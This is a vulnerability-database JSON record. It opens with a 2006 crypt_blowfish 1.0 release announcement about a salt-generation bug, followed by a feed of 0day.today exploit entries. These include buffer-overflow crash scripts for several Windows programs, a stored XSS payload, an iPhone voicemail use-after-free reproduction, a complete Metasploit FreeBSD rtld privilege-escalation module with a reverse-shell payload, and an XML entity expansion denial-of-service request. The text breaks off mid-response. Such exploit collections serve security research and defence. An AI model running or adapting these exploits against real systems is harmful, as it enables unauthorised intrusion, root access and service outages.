{"id": "SECURITYVULNS:DOC:11327", "bulletinFamily": "software", "title": "crypt_blowfish 1.0", "description": "Hi,\r\n\r\nThis is to announce the first mature version of crypt_blowfish and the\r\nminor security fix that this version adds.\r\n\r\ncrypt_blowfish is a public domain implementation of a modern password\r\nhashing algorithm based on the Blowfish block cipher, provided via the\r\ncrypt(3) and a reentrant interface. It is compatible with bcrypt\r\n(version 2a) by Niels Provos and David Mazieres, as used in OpenBSD.\r\nThe homepage for crypt_blowfish is:\r\n\r\n http://www.openwall.com/crypt/\r\n\r\nThe most important property of bcrypt (and thus crypt_blowfish) is that\r\nit is adaptable to future processor performance improvements, allowing\r\nyou to arbitrarily increase the processing cost of checking a password\r\nwhile still maintaining compatibility with your older password hashes.\r\nAlready now bcrypt hashes you would use are several orders of magnitude\r\nstronger than traditional Unix DES-based or FreeBSD-style MD5-based\r\nhashes.\r\n\r\nBesides providing a bcrypt implementation, the crypt_blowfish package\r\nalso includes a generic password hashing framework and hooks for\r\nintroducing this framework into the GNU C Library. The provided\r\nfunctions include crypt_gensalt*(), a family of functions for generating\r\n"salts" for use with common Unix password hashing methods (that is, not\r\nonly with bcrypt).\r\n\r\nMarko Kreen has discovered and reported a minor security bug in\r\ncrypt_blowfish 0.4.7 and below. The bug affected the way salts for\r\nBSDI-style extended DES-based and for FreeBSD-style MD5-based password\r\nhashes were generated with the crypt_gensalt*() functions. It would\r\nresult in a higher than expected number of matching salts with large\r\nnumbers of password hashes of the affected types. crypt_gensalt*()'s\r\nfunctionality for Blowfish-based (bcrypt) hashes that crypt_blowfish\r\nitself implements and for traditional DES-based crypt(3) hashes was not\r\naffected.\r\n\r\nSince bcrypt hashes were not affected, default installs of\r\nOpenwall GNU/*/Linux (Owl) were never affected either. The specific\r\nimpact this could have on non-default installs of Owl is described in\r\nthe latest Owl-current change log entry for glibc:\r\n\r\n http://www.openwall.com/Owl/CHANGES-2.0.shtml\r\n\r\nSince Owl 2.0 is scheduled to be released really soon and since the bug\r\nis minor, we are not planning a similar glibc update for Owl 1.1-stable.\r\nInstead, the 1.1-stable branch will be obsoleted by the new release.\r\n\r\nFor those curious about the nature of the bug, it was unintended sign\r\nextension on a typecast.\r\n\r\nAs this crypt_blowfish bug is my own, and as I was well aware of this\r\npitfall and avoided it in other places, I am very embarrassed about\r\nthis. I apologize to anyone who might be affected for the exposure and\r\ninconvenience this causes.\r\n\r\n-- \r\nAlexander Peslyak <solar at openwall.com>\r\nGPG key ID: B35D3598 fp: 6429 0D7E F130 C13E C929 6447 73C3 A290 B35D 3598\r\nhttp://www.openwall.com - bringing security into open computing environments", "published": "2006-02-08T00:00:00", "modified": "2006-02-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11327", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:15", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "7e34649fa1f94b522a36ca4a8f2bc9d1"}, {"key": "href", "hash": "73c78ef1b45270ff2744349d3df7245b"}, {"key": "modified", "hash": "74890c300562ea209bc37201a603667f"}, {"key": "published", "hash": "74890c300562ea209bc37201a603667f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "a334b7c5442442de425ad68654acb4bd"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "352ba88e62b123c364b09390ccbbf24196afed58ae0b07bfb57d612fa027e035", "viewCount": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-08-31T11:10:15"}, "dependencies": {"references": [{"type": "nessus", "idList": ["REDHAT-RHSA-2016-1840.NASL", "PHOTONOS_PHSA-2016-0013.NASL", "PHOTONOS_PHSA-2017-0040.NASL", "F5_BIGIP_SOL16845.NASL", "SUSE_SU-2018-2275-1.NASL", "OPENSUSE-2018-846.NASL", "OPENSUSE-2018-809.NASL", "SUSE_SU-2018-2145-1.NASL", "SUSE_SU-2018-2084-1.NASL", "OPENSUSE-2018-771.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149050", "PACKETSTORM:148811", "PACKETSTORM:148753"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2287-1", "OPENSUSE-SU-2018:2212-1", "OPENSUSE-SU-2018:2133-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851850"]}, {"type": "zdt", "idList": ["1337DAY-ID-30839", "1337DAY-ID-30805"]}, {"type": "exploitdb", "idList": ["EDB-ID:45149"]}], "modified": "2018-08-31T11:10:15"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "affectedSoftware": []}

{"zdt": [{"lastseen": "2019-05-24T21:51:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32785", "href": "https://0day.today/exploit/description/32785", "title": "Terminal Services Manager 3.2.1 - Denial of Service Exploit", "type": "zdt", "sourceData": "# -*- coding: utf-8 -*-\r\n# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service\r\n# Author: Alejandra S\u00e1nchez\r\n# Vendor Homepage: https://lizardsystems.com\r\n# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe\r\n# Version: 3.2.1 (Build 247)\r\n# Tested on: Windows 10\r\n\r\n# Steps to produce the crash:\r\n# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'\r\n# 2.- Open Terminal Services Manager\r\n# 3.- Click 'Add computer'\r\n# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'\r\n# 5.- In the 'List' tab select the computer created.\r\n# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash! \r\n\r\nbuffer = \"\\x41\" * 5000\r\n\r\nf = open (\"evil.txt\", \"w\")\r\nf.write(buffer)\r\nf.close()\r\n\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32785"}, {"lastseen": "2019-05-24T21:51:53", "bulletinFamily": "exploit", "description": "Exploit for iOS platform in category dos / poc", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32786", "href": "https://0day.today/exploit/description/32786", "title": "Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free Exploit", "type": "zdt", "sourceData": "Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. Carriers set up a Visual Voicemail server that supports IMAP, and the device queries this server for new email. Visual Voicemail is configured over SMS, and carriers inform devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server.\r\n\r\nSMS messages are determined to be VVM-related based on their PID field as well as their contents. Both of these fields can be set by a device sending SMS messages, so any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message. This means that an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way.\r\n\r\nThere is an object lifetime issue in the iPhone IMAP client that can be accessed in this way. It happens when a NAMESPACE command response contains a namespace that cannot be parsed correctly. It leads to the mailbox separator being freed, but not replaced with a valid object. This leads to a selector being called on an object that is not valid.\r\n\r\nTo reproduce this issue:\r\n\r\n1) Run testcrash.py on a remotely accessible server. To run on port 993, this will need to be on a server that has a domain name, and a certificate that verifies correctly. Replace the \"YOUR KEY HERE\" fields in testcrash.py with the location of the cert files. On some carriers, it is possible to use port 143 without SSL instead.\r\n\r\n2) Send the attached SMS messages to the device, first statepdu.txt and then mboxupdatepdu.txt. Replace the destination number and server location in the messages with the location of your target device and server before sending.\r\n\r\n3) The device will connect to the server, and then crash\r\n\r\nNote that this attack depends somewhat on the carrier the device is on. I tested this issue on an AT&T SIM. I was not able to reproduce this issue on a T-Mobile SIM, because their network does not allow VVM connections to outside servers. It might be possible to bypass this by hosting the server on a peer device on the network, but I didn't try this. The PID used for VVM SMS messages also varies based on carrier.\r\n\r\nI've attached a crash log for this issue. I've also attached decoded.txt, which describes the contents of the SMS pdus, and NAMESPACE.zip, which is a non-minimized PoC that leaders to a wider variety of crashes.\r\n\r\nWhen retrieving a message, the VVM client calls [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] to get the server separator and namespace prefix. This method first retrieves the server separator by calling [MFIMAPConnection separatorChar] which causes the LIST command to be sent to the server, and returns the separator. The method also stores the separator as a member of the connection object, which gives the separator its sole reference. [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] then calls [MFIMAPConnection serverPathPrefix] to get the prefix, which in turn calls [MFIMAPConnection _doNamespaceCommand] to perform the NAMESPACE command over the network. If this command fails for any reason (for example, malformed response, LOGOUT command, etc.), it will call [MFIMAPConnection disconnectAndNotifyDelegate:], which removes the separator from the connection object, removing its only reference. The rest of [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] will then use a separator object that has been freed.\r\n\r\nThis issue was resolved by adding a lock to [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] and [MFIMAPConnection disconnectAndNotifyDelegate:] so that they cannot run at the same time for the same connection.\r\n\r\nThis issue was fixed on Tuesday, May 14\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32786"}, {"lastseen": "2019-05-24T23:55:21", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32799", "href": "https://0day.today/exploit/description/32799", "title": "Cyberoam Transparent Authentication Suite 2.1.2.5 - (NetBIOS Name) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: https://www.cyberoam.com\r\n#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip\r\n#Tested Version: 2.1.2.5\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: ctas_nn_2.1.2.5.py\r\n#2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard\r\n#3.- Open Cyberoam Transparent Authentication Suite\r\n#4.- Select General > in Domain Type select \"Microsoft Active Directory\"\r\n#5.- In \"NetBIOS Name\" Paste Clipboard\r\n#6.- Click on \"Apply\"\r\n#7.- Crashed! \r\n\r\ncod = \"\\x41\" * 1500\r\n\r\nf = open('ctas_nn_2.1.2.5.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32799"}, {"lastseen": "2019-05-24T12:04:41", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-23T00:00:00", "published": "2019-05-23T00:00:00", "id": "1337DAY-ID-32775", "href": "https://0day.today/exploit/description/32775", "title": "RarmaRadio 2.72.3 - (Username) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: http://www.raimersoft.com/\r\n#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe\r\n#Tested Version: 2.72.3\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: rarmaradio_username.py\r\n#2.- Open rarma_user.txt and copy content to clipboard\r\n#3.- Open RarmaRadio\r\n#4.- Select \"Edit\" > \"Settings\" > \"Network\"\r\n#5.- In \"Username\" field paste Clipboard\r\n#6.- Select \"OK\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 5000\r\n\r\nf = open('rarma_user.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32775"}, {"lastseen": "2019-05-24T12:05:13", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-05-23T00:00:00", "published": "2019-05-23T00:00:00", "id": "1337DAY-ID-32771", "href": "https://0day.today/exploit/description/32771", "title": "AUO Solar Data Recorder < 1.3.0 - addr Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: AUO Solar Data Recorder - Stored XSS\r\n# Exploit Author: Luca.Chiou\r\n# Vendor Homepage: https://www.auo.com/zh-TW\r\n# Version: AUO Solar Data Recorder all versions prior to v1.3.0\r\n# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index\r\n\r\n# 1. Description:\r\n# In AUO Solar Data Recorder web page,\r\n# user can modify the system settings by access the /protect/config.htm.\r\n# Attackers can inject malicious XSS code in parameter \"addr\" of post data.\r\n# The value of addr will be stored in database, so that cause a stored XSS vulnerability.\r\n\r\n# 2. Proof of Concept:\r\n# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm\r\n# Send this post data:\r\n addr= \"<script>alert(123)</script>&dhcp=1\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32771"}, {"lastseen": "2019-05-22T13:56:13", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability in the FreeBSD run-time link-editor (rtld). The rtld unsetenv() function fails to remove LD_* environment variables if __findenv() fails. This can be abused to load arbitrary shared objects using LD_PRELOAD, resulting in privileged code execution.", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "1337DAY-ID-32767", "href": "https://0day.today/exploit/description/32767", "title": "FreeBSD rtld execl() Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD rtld execl() Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD\r\n run-time link-editor (rtld).\r\n\r\n The rtld `unsetenv()` function fails to remove `LD_*`\r\n environment variables if `__findenv()` fails.\r\n\r\n This can be abused to load arbitrary shared objects using\r\n `LD_PRELOAD`, resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 7.2-RELEASE (amd64); and\r\n FreeBSD 8.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Kingcope', # Independent discovery, public disclosure, and exploit\r\n 'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824)\r\n 'bcoles' # Metasploit (using Kingcope's exploit code [modified])\r\n ],\r\n 'DisclosureDate' => '2009-11-30',\r\n 'Platform' => ['bsd'], # FreeBSD\r\n 'Arch' =>\r\n [\r\n ARCH_X86,\r\n ARCH_X64,\r\n ARCH_ARMLE,\r\n ARCH_AARCH64,\r\n ARCH_PPC,\r\n ARCH_MIPSLE,\r\n ARCH_MIPSBE\r\n ],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '37154'],\r\n ['CVE', '2009-4146'],\r\n ['CVE', '2009-4147'],\r\n ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],\r\n ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],\r\n ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],\r\n ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],\r\n ['URL', 'https://securitytracker.com/id/1023250']\r\n ],\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp',\r\n 'PrependSetresuid' => true,\r\n 'PrependSetresgid' => true,\r\n 'PrependFork' => true,\r\n 'WfsDelay' => 10\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def suid_exe_path\r\n datastore['SUID_EXECUTABLE']\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(7\\.[012]|8\\.0)/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n unless command_exists? 'gcc'\r\n vprint_error 'gcc is not installed'\r\n return CheckCode::Safe\r\n end\r\n print_good 'gcc is installed'\r\n\r\n unless setuid? suid_exe_path\r\n vprint_error \"#{suid_exe_path} is not setuid\"\r\n return CheckCode::Detected\r\n end\r\n vprint_good \"#{suid_exe_path} is setuid\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n if base_dir.length > 1_000\r\n fail_with Failure::BadConfig, \"#{base_dir} path length #{base_dir.length} is larger than 1,000\"\r\n end\r\n\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n\r\n executable_data = <<-EOF\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n\r\nvoid _init() {\r\n extern char **environ;\r\n environ=NULL;\r\n system(\"#{payload_path} &\");\r\n}\r\nEOF\r\n\r\n executable_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload \"#{executable_path}.c\", executable_data\r\n output = cmd_exec \"gcc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall\"\r\n register_file_for_cleanup \"#{executable_path}.o\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.c failed to compile\"\r\n end\r\n\r\n lib_name = \".#{rand_text_alphanumeric 5..10}\"\r\n lib_path = \"#{base_dir}/#{lib_name}\"\r\n output = cmd_exec \"gcc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles\"\r\n register_file_for_cleanup \"#{lib_path}.0\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{executable_path}.o failed to compile\"\r\n end\r\n\r\n exploit_data = <<-EOF\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nint main() {\r\n extern char **environ;\r\n environ = (char**)calloc(8096, sizeof(char));\r\n\r\n environ[0] = (char*)calloc(1024, sizeof(char));\r\n environ[1] = (char*)calloc(1024, sizeof(char));\r\n strcpy(environ[1], \"LD_PRELOAD=#{lib_path}.0\");\r\n\r\n return execl(\"#{suid_exe_path}\", \"\", (char *)0);\r\n}\r\nEOF\r\n\r\n exploit_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload \"#{exploit_path}.c\", exploit_data\r\n output = cmd_exec \"gcc #{exploit_path}.c -o #{exploit_path} -Wall\"\r\n register_file_for_cleanup exploit_path\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{exploit_path}.c failed to compile\"\r\n end\r\n\r\n upload payload_path, generate_payload_exe\r\n chmod payload_path\r\n\r\n print_status 'Launching exploit...'\r\n output = cmd_exec exploit_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n end\r\nend\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32767"}, {"lastseen": "2019-05-22T13:55:10", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-21T00:00:00", "published": "2019-05-21T00:00:00", "id": "1337DAY-ID-32753", "href": "https://0day.today/exploit/description/32753", "title": "Deluge 1.3.15 - (URL) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: https://dev.deluge-torrent.org/\r\n#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe\r\n#Tested Version: 1.3.15\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: deluge_url.py\r\n#2.- Open deluge_url.txt and copy content to clipboard\r\n#3.- Open deluge.exe\r\n#4.- Select \"File\" > \"Add Torrent\" > \"URL\"\r\n#5.- In \"From URL\" field paste Clipboard\r\n#6.- Select \"OK\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 5000\r\n\r\nf = open('deluge_url.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32753"}, {"lastseen": "2019-05-22T13:55:17", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-21T00:00:00", "published": "2019-05-21T00:00:00", "id": "1337DAY-ID-32754", "href": "https://0day.today/exploit/description/32754", "title": "Deluge 1.3.15 - (Webseeds) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: https://dev.deluge-torrent.org/\r\n#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe\r\n#Tested Version: 1.3.15\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: deluge_web.py\r\n#2.- Open deluge_web.txt and copy content to clipboard\r\n#3.- Open deluge.exe\r\n#4.- Select \"File\" > \"Create Torrent\" \r\n#5.- In \"Webseeds\" field paste Clipboard\r\n#6.- Crashed\r\n\r\ncod = \"\\x41\" * 5000\r\n\r\nf = open('deluge_web.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32754"}, {"lastseen": "2019-05-22T13:55:42", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2019-05-21T00:00:00", "published": "2019-05-21T00:00:00", "id": "1337DAY-ID-32757", "href": "https://0day.today/exploit/description/32757", "title": "Oracle CTI Web Service - (EBS_ASSET_HISTORY_OPERATIONS) XML Entity Injection Exploit", "type": "zdt", "sourceData": "# Exploit Title: Oracle CTI Web Service XML Entity Exp.\r\n# Exploit Author: omurugur\r\n# Author Web: https://www.justsecnow.com\r\n# Author Social: @omurugurrr\r\n\r\nURL : http://10.248.68.188/EBS_ASSET_HISTORY_OPERATIONS\r\n\r\n \r\n\r\nAs can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.\r\n\r\n10kb more request is returned.\r\nExamples Request;\r\n\r\n \r\n\r\nPOST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1\r\n\r\nAccept-Encoding: gzip, deflate\r\n\r\nContent-Type: text/xml;charset=UTF-8\r\n\r\nSOAPAction: \"getCampaignHistory\"\r\n\r\nContent-Length: 1696\r\n\r\nHost: ****\r\n\r\nUser-Agent: Apache-HttpClient/4.1.1 (java 1.5)\r\n\r\nConnection: close\r\n\r\n\r\n<!DOCTYPE foo [<!ENTITY ha \"Ha !\"> <!ENTITY ha2 \"&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;\"> <!ENTITY ha3 \"&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;\"> <!ENTITY ha4 \"&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;\"> <!ENTITY ha5 \"&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;\"> <!ENTITY ha6 \"&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;\"> ]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ebs=\"http://www.avea.com.tr/om/EBS_ASSET_HISTORY_OPERATIONS\" xmlns:ave=\"http://www.avea.com.tr/AveaFrameWo&ha6;rk\">\r\n\r\n <soapenv:Header/>\r\n\r\n <soapenv:Body>\r\n\r\n <ebs:EbsRetrieveWebChatHistoryRequest>\r\n\r\n <ave:RequestHeader>\r\n\r\n <ave:RequestId>\r\n\r\n <ave:GUID>152069827209115206982720</ave:GUID>\r\n\r\n </ave:RequestId>\r\n\r\n <ave:CallingSystem>SIEBEL</ave:CallingSystem>\r\n\r\n <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>\r\n\r\n </ave:RequestHeader>\r\n\r\n <ebs:RequestBody>\r\n\r\n <ebs:msisdn>5051234567</ebs:msisdn>\r\n\r\n </ebs:RequestBody>\r\n\r\n </ebs:EbsRetrieveWebChatHistoryRequest>\r\n\r\n </soapenv:Body>\r\n\r\n</soapenv:Envelope>\r\n\r\n \r\nExample Response1;\r\n\r\n\r\nHTTP/1.1 500 Internal Server Error\r\n\r\nDate: Tue, 17 Apr 2018 06:33:07 GMT\r\n\r\nContent-Type: text/xml; charset=utf-8\r\n\r\nX-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df\r\n\r\nX-ORACLE-DMS-RID: 0\r\n\r\nConnection: close\r\n\r\nContent-Length: 328676\r\n\r\n \r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n\r\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header xmlns:ave=\"http://www.avea.com.tr/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha\r\n\r\n! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk\" xmlns:ebs=\"http://www.avea.com.tr/om/EBS_ASSET_HISTORY_OPERATIONS\"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul=\"http://www.avea.com.tr/Fault\"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus 